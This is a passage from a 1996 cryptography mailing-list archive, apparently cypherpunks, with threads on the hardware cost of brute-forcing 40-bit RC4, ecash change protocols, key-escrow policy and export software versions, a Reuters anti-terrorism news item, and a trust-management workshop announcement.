implimentation to me due to idiotic ITAR restrictions.

If someone not as constrained could address the problem described, I
should be delighted.

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 31 Jul 1996 15:16:34 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Paranoid Musings
Message-ID: <199607310502.WAA09812@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm really feeling much better now :-).

At  6:48 PM 7/30/96 -0400, Mark M. wrote:
>On Tue, 30 Jul 1996, Bill Frantz wrote:
>> The paranoid conclusion is that there is a significant weakness in RC4.
>
>An FPGA can break RC4 in a few hours.  With several thousand of these, RC4
>could be broken in about a second.  Besides, RC4 has been around for 9 years
>and has not been successfully cryptanalyzed.  The RC4 algorithm is extremely
>simple and doesn't have any obvious weaknesses.

IMHO, NSA's cryptanalysis is second to none.  I have been assuming a
weakness based on a classified cryptanalysis technique.  They have
certainly been thinking about "S-Box" cyphers since at least Lucifer and
DES.  But let's approach the question from a different angle.  Consider the
number of messages that need to be broken and the costs of machines to do
it.

How many encrypted messages do you think NSA wants to read?  I have no idea
either, but in the spirit of never depend on expert opinion when simple
arithmetic will do, let's assume a world where major email packages use
encryption as a matter of course.  If we assume that the 30 million net
users send one email/day, then that results in about 350/second.  If I
assume your "several thousand" is 2000, then we need a machine with 700,000
FPGA's.  Given Matt Blaze et. al.'s estimate of $10/chip complete, that is
$7 million.  However if you take the NSA's estimate (in their response to
Blaze et al) of $1000/chip, then you get $700 million.

If we assume a machine designed to break *every* message, NSA's response
makes more sense.  From their response (reordered):

>The factors not accounted for are:
>
>  o Memory costs are not included.
It needs to store all the messages it is attacking.

>  o When get [sic] to the very fast processing speed estimates,
>    machines can become Input/Output bound; so [sic] it cannot achieve
>    the estimated speed.
It needs to get all those messages into the machine, the plaintext out, and
distribute the data to the FPGAs.

>  o As more and more chips are added to a machine, two effects occur:
>
>      o Interconnections increase and increase running time;
>      o Heat from the chips eventually limit [sic] the size of a
>        machine.
Fast machines produce a lot of heat.

>  o R&D costs for the first machine, typically on the order of $10
>    million.
R&D costs for high-speed I/O, large memories, and efficient heat removal
might be significant.

>  o Assuming every algorithm can be tested in same amount of time and
>    key length is the only difference.
This is one of Blase et. al.'s simplifying assumptions.  RC4 has a simple
key setup and runs faster than DES.  Brute forcing 40 bit Blowfish would be
considerably harder.  Probably about equal to 9 additional key bits harder.


Now I have no problem with believing NSA would invest $7 million.  However,
$700 million makes me wonder.  With FPGAs, there is a significant risk that
people will change the crypto system and make the investment worthless. 
(Which, I guess, is why they prefer general purpose computers.)  However,
if they can get the equivalent of a few bits of key back by cryptanalysis,
then they knock the costs down to entirely reasonable (for them) levels.


-------------------------------------------------------------------------
Bill Frantz       | Cave ab homine unius lebri | Periwinkle -- Consulting
(408)356-8506     |  [Beware the man of one    | 16345 Englewood Ave.
frantz@netcom.com |   book]  - Anonymous Latin | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 31 Jul 1996 13:14:58 +0800
To: cypherpunks@toad.com
Subject: Re: Taxes in the digicash world (fwd)
Message-ID: <199607310310.WAA04147@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 31 Jul 1996 12:14:50 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: Taxes in the digicash world
> 
> * electronic and computer goods are often untaxed because many order them
> via mail-order. There have been proposals to tax out-of-state purchases,
> but the logistics and legal issues are murky (who gets the tax? and why
> should Idaho, for example, get the tax revenue for an item ordered from
> Georgia?).

The State of Texas requires by law that tax be paid on out of state
purchases. You legaly should send in a check with copies of the receipts
each year to the State Comptrollers Office. Historicaly everyone ignores it.

                                                    Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 31 Jul 1996 15:42:19 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <199607302312.QAA28508@netcom6.netcom.com>
Message-ID: <a8RwRD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mpd@netcom.com (Mike Duvos) writes:

> David Sternlight writes:
>
>  > ... I've unsubscribed ...
>
> Door.  Ass.  Bump.

Good riddance.  For once, SternFUD did something I approve of.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 15:10:44 +0800
To: cypherpunks@toad.com
Subject: Re: VISA Travel Money
In-Reply-To: <Pine.LNX.3.93.960730215245.174C-100000@smoke.suba.com>
Message-ID: <199607310523.WAA01116@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Snow writes:

> This card has the value "written" when you "purchase" it right? 

No.  Unlike the VISA Cash Card, which has a chip in it and holds
value, this card is simply associated with an account containing 
the money, which is accessed in the normal manner using ATMs and
VISA's PLUS network.  You can even have multiple cards issued on 
same account, if you choose to do so, and you get the standard set
of cardmember services, such as lost card replacement, that you
get with a regular credit card. 

> Any one wanna bet on how long it will take the "Hacker" Community
> to figure out how to "refill" it? Otherwise all you have is a 
> debit card. 

Which is precisely what this card is.  A disposable debit card 
sold through participating financial institutions. 

That isn't to say hackers might not have some fun with the 
system, but the card by itself is not vulnerable to such an
attack. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 31 Jul 1996 13:02:10 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <v03007801ae242b4f7350@[192.187.162.15]>
Message-ID: <v0300780eae24744fc7d0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:12 PM -0400 7/30/96, Mike Duvos wrote:
> David Sternlight writes:
>
>  > ... I've unsubscribed ...
>
> Door.  Ass.  Bump.

He's gone?

Cool.

Anyone wanna buy a used water-cooled killfile, cheap?

;-)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Wed, 31 Jul 1996 15:53:54 +0800
To: cypherpunks@toad.com
Subject: Re: You know it's getting late when... (fwd)
In-Reply-To: <ae243935020210042ce4@[205.199.118.202]>
Message-ID: <199607310601.XAA17897@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes:

 > And historically the lack of canine eradication programs has been 
 > a major way to control the "homeless problem," so the State is 
 > making the homeless problem worse by removing natural pest control 
 > mechanisms.

Reminds me of the person who characterized the rise of the Radical 
Religious Right to power as due to "a shortage of lions."  

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 31 Jul 1996 13:49:08 +0800
To: jim@ACM.ORG
Subject: Re: WaPo on Crypto-Genie Terrorism
In-Reply-To: <199607310026.RAA20205@mycroft.rand.org>
Message-ID: <199607310328.XAA03602@nrk.com>
MIME-Version: 1.0
Content-Type: text


> "Stays less than a month" pays evens.
> "Audibly killfiles at least one person" pays 1 to 7.
> 
> Stand not upon the order of your going, but go at once...
> 
> 	Jim Gillogly

Ahhem...
As I immodestly remember, I called both of these.

I should therefore be Really Rich.. Right?

However, I'd like to donate my winning to a worthy 'Punk cause --
the Tim May Hot Tub Maintenance Fund....
Call 1-800-TIMS TUB for details....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Wed, 31 Jul 1996 16:57:32 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
In-Reply-To: <1.5.4.32.19960729084347.00331d14@giasdl01.vsnl.net.in>
Message-ID: <4tmv28$1hn@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <1.5.4.32.19960729084347.00331d14@giasdl01.vsnl.net.in>,
Arun Mehta  <amehta@giasdl01.vsnl.net.in> wrote:
>At 05:15 24/07/96 -0500, Matt Carpenter wrote:
>
>>getting change from the merchant.  Ian Goldberg pointed out that
>>with the current ecash protocol, accepting change not only eliminates your
>>anonymity, but that you also have to go online to make sure you aren't being
>>cheated.
But don't forget that you can use a slightly modified protocol to accept
change anonymously, without having to go online!
>
>I'm sure it should be possible for the merchant to electronically
>give you an "IOU" for the amount of change s/he owes you, no
>matter how small, without loss of your anonymity. Next time you
>go to the same merchant, the IOU could automatically be adjusted
>against the new purchase.

An IOU is equivalent to a coupon.  You could even implement it as ecash
issued by the merchant, but why?  Using the "change" protocol, you can
do it with real ecash just as easily.  It's just as hard to get an
HP48 to check the signature on change coins returned by the merchant as it
is to check the signature on the IOU.

An HP48 is unlikely to be able to do 768-bit RSA operations.  However,
it could easily have coins stored on it, transmitted to the store via
a convenient IR port, or an RS232 connection.  It's quite straightforward;
if I had a store, I'd do it myself...

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMf7/hUZRiTErSPb1AQFmCwQAj13wUVsf7zoUV9KuhnSIcEm1cELeHmfS
voz+evncXOfr0aDEwb7y90iDwmm68Xrgq3IILKBLS+iu0s54LCG/jeBCPjW3b9oE
nyZK47qRSmdHI7sqEwtWxlKrU4/trwY98q0nzZEIFvdJfRykPl0+Im0NBdRBYXVP
i9h4uLuZz4k=
=2ek/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: j ubois <jubois@netcom.com>
Date: Wed, 31 Jul 1996 18:03:26 +0800
To: "'Alan Horowitz'" <mpd@netcom.com>
Subject: RE: A Libertine Question
Message-ID: <01BB7E76.400794E0@jubois3.mbaynet.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz wrote: 

I am a strong libertarian...{deletia}...damn well maintain public 
order and decorum. ***Or I will scream to my councilman for the cops to 
adjust your attitude with their billy club.***

Sounds consistent and rational to me. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Wed, 31 Jul 1996 18:20:55 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: NBC
In-Reply-To: <v03007801ae23ea7efa82@[17.202.12.102]>
Message-ID: <Pine.BSI.3.91.960731003413.18901C-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 30 Jul 1996, Martin Minow wrote:

> Since I've been in this business for well over thirty years and,
> about ten years ago, had one of my systems infested by Kevin
> Mitnick, I'm not particularly sympathetic to the "we're just
> trying to learn" mentality -- if you want to learn, buy a PC
> and a Linux CD, write some code, give it away, and make a real
> contribution to the community.

The taped interview lasted more than two hours, with only five minutes 
airing, so a lot of statements from our mouth is still out of context.

As far as your learning suggestions, I have over 17 years of experience 
in this "underground community", have owned every type of machine 
available, can safely guess I have written a large amount of source code 
equivelent to some of the best, always give it away, and can definitely 
say I have made more a contribution than you could ever hope for in your 
wildest dreams. :)

Dealing with the media is a double edge sword. They contacted me, gaveme 
their bent, and tpaed with me. You can figure out of two hours of tape, 
that with five minutes showing, vaery mnay important points got left out 
which would have put aired statements into context. You never know what 
they, and their editors, ultimately put in the story, for which I have 
yet to see due to my presence at Defcon.

Know who you flame before you do so.  :) No hard feelings.

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Wed, 31 Jul 1996 18:36:34 +0800
To: cypherpunks@toad.com
Subject: Re: Paranoid Musings
In-Reply-To: <199607310502.WAA09812@netcom7.netcom.com>
Message-ID: <4tn2q1$mh5@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <199607310502.WAA09812@netcom7.netcom.com>,
Bill Frantz <frantz@netcom.com> wrote:
> At  6:48 PM 7/30/96 -0400, Mark M. wrote:
> >An FPGA can break RC4 in a few hours.

I don't think so.  None of the FPGAs Ian & I looked at could even approach
the RC4-cracking performance of a fast Intel CPU.

>                                    If we assume that the 30 million net
> users send one email/day, then that results in about 350/second.  If I
> assume your "several thousand" is 2000, then we need a machine with 700,000
> FPGA's.  Given Matt Blaze et. al.'s estimate of $10/chip complete, that is
> $7 million.  However if you take the NSA's estimate (in their response to
> Blaze et al) of $1000/chip, then you get $700 million.

Those estimates assume that a single FPGA can break RC4 in hours.  I think
that is an extremely optimistic assumption, given the available public
information.  But perhaps NSA is orders of magnitude ahead of us in chip
design (unlikely) or orders of magnitude ahead of us in RC4 cryptanalysis
(and we're back to paranoid musings).

> If we assume a machine designed to break *every* message, NSA's response
> makes more sense.  From their response (reordered):
> 
> >The factors not accounted for are:
> >
> >  o Memory costs are not included.
> It needs to store all the messages it is attacking.

Naw, this is orthogonal to the cost of cryptanalysis-- even when all messages
are sent in the clear, they still need this storage.

I would be willing to believe that message selection & storage is a very
expensive part of SIGINT.  However, if one has the resources to break all
encrypted messages in realtime, I don't see why message selection & storage
costs need to increase so significantly.

> >  o When get [sic] to the very fast processing speed estimates,
> >    machines can become Input/Output bound; so [sic] it cannot achieve
> >    the estimated speed.
> It needs to get all those messages into the machine, the plaintext out, and
> distribute the data to the FPGAs.

Nope, I don't buy it.  Show me a chip takes longer to load a known plaintext
and ciphertext pair than it takes to do a 40-bit exhaustive keysearch for that
pair, and I'll show you a chip that has no I/O pins. :-)

Remember, if you have a million FPGAs to crack a thousand messages, you don't
have to send the first message to all million FPGAs, then send the second
message to all million FPGAs, etc.  Instead you should send the first message
to the first thousand FPGAs, and concurrently send the second message to the
second thousand FPGAs, etc.

> >  o Assuming every algorithm can be tested in same amount of time and
> >    key length is the only difference.
> This is one of Blase et. al.'s simplifying assumptions.  RC4 has a simple
> key setup and runs faster than DES.  Brute forcing 40 bit Blowfish would be
> considerably harder.  Probably about equal to 9 additional key bits harder.

I agree that key schedule complexity can have a significant influence on the
complexity of exhaustive keysearch.

However, DES's key schedule is actually much better suited to exhaustive
keysearch than RC4's key schedule is.  (I speak with implementation experience.
However, it's not too hard to see why this should be true-- DES was designed
for implementation in hardware, and its keyschedule consists merely of some
bit permutations, which are free in hardware.  RC4 uses RAM heavily, and thus
can incur large I/O costs, and also is highly serialized, so it is not so
well-suited to efficient hardware implementation.)

Yup, brute-forcing 40-bit Blowfish will probably be even harder than RC4.

>                                With FPGAs, there is a significant risk that
> people will change the crypto system and make the investment worthless. 

No, FPGAs are programmable logic, and thus can be easily reprogrammed if the
Netscape default encryption algorithm changes.  Perhaps you are thinking of
ASICs, which have their logic burned in, and cannot be changed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 31 Jul 1996 11:41:59 +0800
To: cypherpunks@toad.com
Subject: Reuter on P8 Anti-Terrorism
Message-ID: <199607310059.AAA24838@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   G7, Russia adopt anti-terror pact, avoid sanctions 
   Date: Tue, 30 Jul 1996 10:00:07 PDT 
 
 
   PARIS (Reuter) - The world's major powers closed ranks to  
   combat terrorism Tuesday, urging other nations to join 
   forces with them but sidestepping a dispute over U.S. 
   demands for sanctions against what Washington calls 
   "terrorist states." 
 
 
   Foreign and security ministers from the Group of Seven 
   industrial nations and Russia approved a list of 25 
   measures to defeat terrorists around the globe. 
 
 
   "We will not stop in this united effort until those 
   responsible are brought to justice," U.S. Attorney General 
   Janet Reno told a news conference after the five-hour 
   meeting of the so-called P8 nations -- P being for 
   political. 
 
 
   The package included pledges to reinforce police 
   cooperation and training, share intelligence, ease 
   extradition and legal assistance, dry up sources of funding 
   and weapons and strengthen national anti-terrorism 
   legislation. 
 
 
   The ministers also vowed to prevent extremists from using  
   the Internet computer network to plan attacks and spread  
   bomb-making instructions. 
 
 
   Participants heard Canadian Foreign Minister Lloyd Axworthy  
   recount how his 11-year-old son had shown him where to find 
   such content on the Internet. 
 
 
   French Foreign Minister Herve de Charette said the meeting 
   had achieved its two objectives, "to adopt concrete 
   measures and to send a very clear signal to the 
   international community and to public opinion that the 
   leaders of the P8 are strongly determined to act 
   shoulder-to-shoulder, hand-in-hand." 
 
 
   Under-Secretary of State Peter Tarnoff said the U.S. 
   delegation had not raised President Clinton's contentious 
   call for "strong sanctions" against four states he says 
   support terrorism -- Iran, Iraq, Libya and Sudan. 
 
 
   France, Japan, Britain and Germany all made clear they 
   would not accept U.S. legislation to punish foreign firms 
   that dealt with such countries. 
 
 
   "We did not discuss country-specific cases ... We recognize  
   the fact that some of legislation passed in the United 
   States recently has encountered opposition among our 
   trading partners," Tarnoff said. 
 
 
   French Interior Minister Jean-Louis Debre, who co-chaired  
   the meeting, said before it began: "The American analysis 
   is a bit simplistic and a bit outdated. If we look at the 
   phenomenon of terrorism today, we can see that it's more 
   complex." 
 
 
   He cited the bomb attack that killed two people and wounded  
   110 at the Atlanta Olympic Games last Saturday as evidence 
   of what he called "home-grown terrorism" without outside 
   help. 
 
 
   State-sponsored and extreme-left terrorism were largely a  
   thing of the past, and the international community now 
   faced two virulent new forms -- regionalist extremism and 
   religious militancy -- which did not have state support, 
   Debre said. 
 
 
   The United States offered extra proposals to tighten 
   airport security and mark explosives chemically so bombers 
   can be more easily traced, which the other countries 
   accepted. 
 
 
   Axworthy voiced widely shared alarm at the use of poison 
   gas in recent attacks in Japan, including on the Tokyo 
   subway. 
 
 
   "We are beginning to see terrifying signs of what the 
   future could hold if we don't take strong action. 
   Terrorists are now getting access to weapons of mass 
   destruction, chemical weapons, biological weapons, even 
   nuclear weapons," he said. 
 
 
   "It's (a threat) that really has a doomsday quality unless  
   we act now," he said.  
 
 
   The United States, Canada, France, Germany, Italy, Japan 
   and Russia agreed that solving regional conflicts and 
   stabilizing crisis areas was the best way to tackle the 
   roots of terrorism. 
 
 
   "There must be no safe havens," German Foreign Minister 
   Klaus Kinkel said. 
 
 
   The ministers agreed their experts would hold follow-up 
   meetings to draft a new international convention to prevent 
   the abuse of political asylum to plan, fund or commit 
   terrorist acts and to coordinate security in public 
   transport. 
 
 
   Japan said it would hold an Asia-Pacific counter-terrorism  
   seminar by next June including Asian and Latin American 
   experts. 
 
 
   [End] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@vegas.gateway.com (Anonymous Remail Service)
Date: Wed, 31 Jul 1996 15:50:37 +0800
To: cypherpunks@toad.com
Subject: Aspol=ego
Message-ID: <199607310540.BAA29017@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell raved:

<snip>

>If anyone out there still doubts that the time for my "Assassination 
                                                    ^^
>Politics" idea will never come, I claim that it's later than you think.

If anyone thinks _YOU_ thought of it first, they don't know history...








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 31 Jul 1996 20:07:25 +0800
To: cypherpunks@toad.com
Subject: Re:FPGAs and Heat (Re: Paranoid Musings)
Message-ID: <v02140b00ae24d66cfbdd@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain



Oddly enough, I just left a talk at the '96 Genetic Programming conference on
developing adaptable hardware and silicon evolution.  One of the speakers at
this particular session was the Product Line Manager from Xilinx and one of
the goodies he handed out was pre-release data sheets for the new XC6200
series of FPGAs they are producing (the chips are already out in limited
quantities) so here is a little update on the state of the art in this area.

Tim May writes:
> Bill Frantz wrote:
> >>  o As more and more chips are added to a machine, two effects occur:
> >>
> >>      o Interconnections increase and increase running time;
> >>      o Heat from the chips eventually limit [sic] the size of a
> >>        machine.
> >Fast machines produce a lot of heat.
>
> But, as many have pointed out, this is not a realistic limit.

One can also use reversible logic to get arond the heat problem if mechanical
means are not enough.  This is a necessity for molecular-scale computing and
during the post-session BS at another talk we speced out a system that could
probably evolve a reversible logic compiler.  Heat will not be a "wall" at
any scale, it may add to the cost a little bit but the problem is solvable.

The interconnection problem has also been solved in this chip series. [A
long-standing problem with FPGAs is that there were generally a limited
amount of "wires" running between the logic elements and thus a lot of cells
were wasted because there were no interconnections left, I/O to the outside
world was also a problem.]  The chip has a really cool interconnection method
which allows a much more efficient use of the chip real estate and which
makes the entire chip directly addresable (like regular RAM) through an
on-chip interface module.  Given the relatively compact design in Ian and
Dave's paper and the new chips one might even fit two or four cracking
engines on a single FPGA.

Either the NSA did not do thier homework in this area or they are lying.

> >Now I have no problem with believing NSA would invest $7 million.  However,
> >$700 million makes me wonder.  With FPGAs, there is a significant risk that
> >people will change the crypto system and make the investment worthless.
> >(Which, I guess, is why they prefer general purpose computers.)  However,
> >if they can get the equivalent of a few bits of key back by cryptanalysis,
> >then they knock the costs down to entirely reasonable (for them) levels.
>
> An FPGA is field-programmable. (FPGA = Field Programmable Gate Arrays) The
> Xilynx and Altera lines of FPGAs could be reconfigured for other
> algorithms, surely. (I recall several preliminary designs discussed in
> various places.)

There are two types of FPGAs, one is based on anti-fuse technology which is
essentially a big complicated PROM, but the Xilinx FPGAs use SRAM to
configure the interconnections between logic elements.  The newest line from
Xilinx, the XC6000 series has the capability to be reconfigured either
partially or completely from an on-chip cache in 5 ns.  That is five
nanoseconds and you have a completely different piece of virtual hardware. If
the configuration is loaded through the slowest I/O port on the chip it only
takes 200 microseconds. Even if the encryption algorithm is secret these
chips open up interesting posiblities for developing general-purpose
cryptanalysis machines. [Hmm, there may be a paper in there... "Evolving A
General-Purpose Cryptanalysis Engine"...]  What is even better from the
perspective of the NSA accountants is that they only need to build the
machine _once_, after that they just load up a new set of interconnections
and now the DES cracker is an IDEA cracker.  Add to this the fact that the
XC6000 series were designed to be built cheaply in large quantities (the
Xilinx rep figures the price will get down to $29/chip in 5K lots for the
samples he was passing around and he is a wafer guy and not marketting droid
so this may be reasonably accurate.)  If anything, the Blaze, et many als.
paper _underestimated_ the cost of a FPGA hardware cracking engine,
particularly if you amortize the savings FPGAs give over the long term with
thier almost limitless flexibility.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 31 Jul 1996 17:31:36 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: A Libertine Question
In-Reply-To: <199607302350.QAA01377@netcom21.netcom.com>
Message-ID: <Pine.SV4.3.91.960731021540.17518A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> From: Mike Duvos <mpd@netcom.com>
> Perhaps, but I can think of a lot of examples.  Laws that make it illegal
> to ask for money.  Laws that say you can't sit on the sidewalk.  Laws
> that make it illegal to feed soup to people without a stack of permits
> six feet high.  Laws that make it illegal to perform an excretory function
> outdoors in a city with almost zero public toilets.  (You should have

   .....You should move out of the city to a place you can afford. 
There is no Constitutional right to live in Seattle.

This country has gone through many many many business cycles, financial 
panics, etc.  Only in the recent era have cities been forced to do these 
crackdowns (you think that herding and pacifying drunk/stoned panhandlers 
is pleasureable?  Try working as a Seattle cop for a week, oh Mr 
Armchair Sociologist) as a desperate measure of self-defense.

We are importing farm labor. There is plenty of work for those who want 
it. Ask the Vietnamese/Cambodian/Laotian refugees who've arrived in Seattle.

I am a strong libertarian. Sell crack cocaine, rent your pussy to horny 
middle-aged businessmen, do any non-violent, 
non-damaging-to-others-property you want, but damn well maintain public 
order and decorum. Or I will scream to my councilman for the cops to 
adjust your attitude with their billy club.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 31 Jul 1996 06:16:13 +0800
To: cypherpunks@toad.com
Subject: Re: Let's Say "No!" to Single, World Versions of Software
Message-ID: <ae238d570002100498cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:57 PM 7/30/96, Arun Mehta wrote:
>At 15:13 30/07/96 -0700, Timothy C. May wrote:
>>
>>It is imperative that Netscape, Microsoft, Qualcomm, and the other players
>>be pressured/urged/cajoled to commit to introducing strong, unescrowed
>>crypto for the *domestic* versions, even if not for export versions.
>
>I agree. Foreign buyers will look askance at software that is
>"second grade" in security terms, just so the US government can
>read their mail. This will encourage non-US software companies to
>fill the vacuum, and US companies will get pissed off and pull
>some strings in Washington.

Exactly.

Having a U.S. version, without any limits on crypto and without any
software key escrow (GAK), and then having a "for export" version, with
keylength limits and/or mandatory registration of keys with the U.S.
National Security Agency....

Well, what this would do is to basically drive sales of the "NSA" version
to near zero. Between customer distaste for an NSA version, I can imagine
many foreign governments not being too pleased to see this product being
used by its citizens.

(We've discussed this many times, since software key escrow came to our
attention in 1993. Imagine the reaction of the United States government if
American corporations adopted a French software product which automatically
gave access to American trade secrets to DGSE ( Direction Generale de
Security France Securite Exterieure), their primary spy agency, and RG
(Direction de Renseignement), their economic intelligence agency. France is
well-known for spying on U.S. businesses (a la the Air France case), and
would no doubt be thrilled to have a "French-GAKked" program in wide use in
the U.S.)

This point has been raised by us many times. And, to be fair, this point is
not lost on the NSA/Freeh/Denning/Gorelick crowd, I am sure. That is, they
would not countenance the importation into the U.S. of "Iraq-GAKked" and
"China-GAKked" programs, for example.

So, what's the deal? The resolution of this quandary almost certainly lies
in an "international agreement," along the lines of the various key escrow
meetings which have been held (Karlsruhe in '93, Washington in '94, etc.).
A "New World Order" solution, with complicated reciprocal agreements about
whom the trusted key authorities might be, how nations could gain access,
etc. (These relationships are too complicated for my brain to handle...how,
for example, would one come to an agreement with Libya? What about Cuba,
given that many of our nominal allies trade freely with Cuba and chafe when
we try to get them to join our boycotts?)

Such an international deal would almost certainly mean that even
fully-domestic versions of software would have to be GAKked.

Hence the need for us to pressure Netscape, Microsoft, Qualcomm, Novell,
etc. *not* to play ball on this. This would then "marginalize" the European
and Asian customers of a special "NSA-readable" version of their products,
and would likely derail the whole thing.

ObMartialLaw: Clinton is pushing to have new "anti-terrorist" legislation
passed *this week*, according to CNN. He wants "memories to be fresh." Joe
Biden wants exanded roving wiretap laws and restrictions on efforts to
"circumvent" wiretaps. Feinstein wants bomb instructions banned. And so it
goes.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 31 Jul 1996 17:40:10 +0800
To: coderpunks@toad.com
Subject: trust management workshop
Message-ID: <199607310702.DAA20723@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


--------------------------------------------------------------------------
| DIMACS: Center for Discrete Mathematics & Theoretical Computer Science |
| A National Science Foundation Science and Technology Center            |
--------------------------------------------------------------------------

DIMACS Workshop on Trust Management in Networks

Dates: Sept. 30 - Oct. 2, 1996

Location: CORE Bldg., Rutgers University Busch Campus, Piscataway NJ

Co-Chairs: Ernie Brickell, Bankers Trust, brickell@btec.com
           Joan Feigenbaum, AT&T Research, jf@research.att.com
           Dave Maher, AT&T Research, dpm@research.att.com


Theme: The use of public-key cryptography on a mass-market scale
requires sophisticated mechanisms for managing trust.  For example,
any application that receives a signed request for action is forced to
answer the central question ``Is the key used to sign this request
authorized to take this action?''  In certain applications, this
question reduces to ``Does this key belong to this person?'' In
others, the authorization question is considerably more complicated,
and resolving it requires techniques for formulating security policies
and security credentials, determining whether particular sets of
credentials satisfy the relevant policies, and deferring trust to
third parties.  This workshop covers all aspects of the trust
management problem.  Relevant topics include but are not limited to:

          General approaches to trust management
          Languages, systems, and tools
          Certificates and public-key infrastructure 
          Formal models and analysis
          Trust management in specific application domains,
                including but not limited to:
                Banking
                E-mail
                Internet commerce
                Licensing
                Medical information systems
                Mobile programs and ``code signing''
                Revocation of cryptographic keys


Confirmed speakers include:

          Butler Lampson, Microsoft
          Matt Blaze, AT&T Research
          Steve Kent, BBN 
          Carl Ellison, Cybercash


Contributed talks:

If you would like to attend and give a talk, please email a one-page
